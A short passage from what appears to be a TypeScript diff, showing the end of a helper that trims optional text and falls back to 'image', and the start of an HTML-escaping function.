null): string { + const trimmed = text?.trim(); + return trimmed ? trimmed : "image"; +} function escapeHtml(value: string): string { return value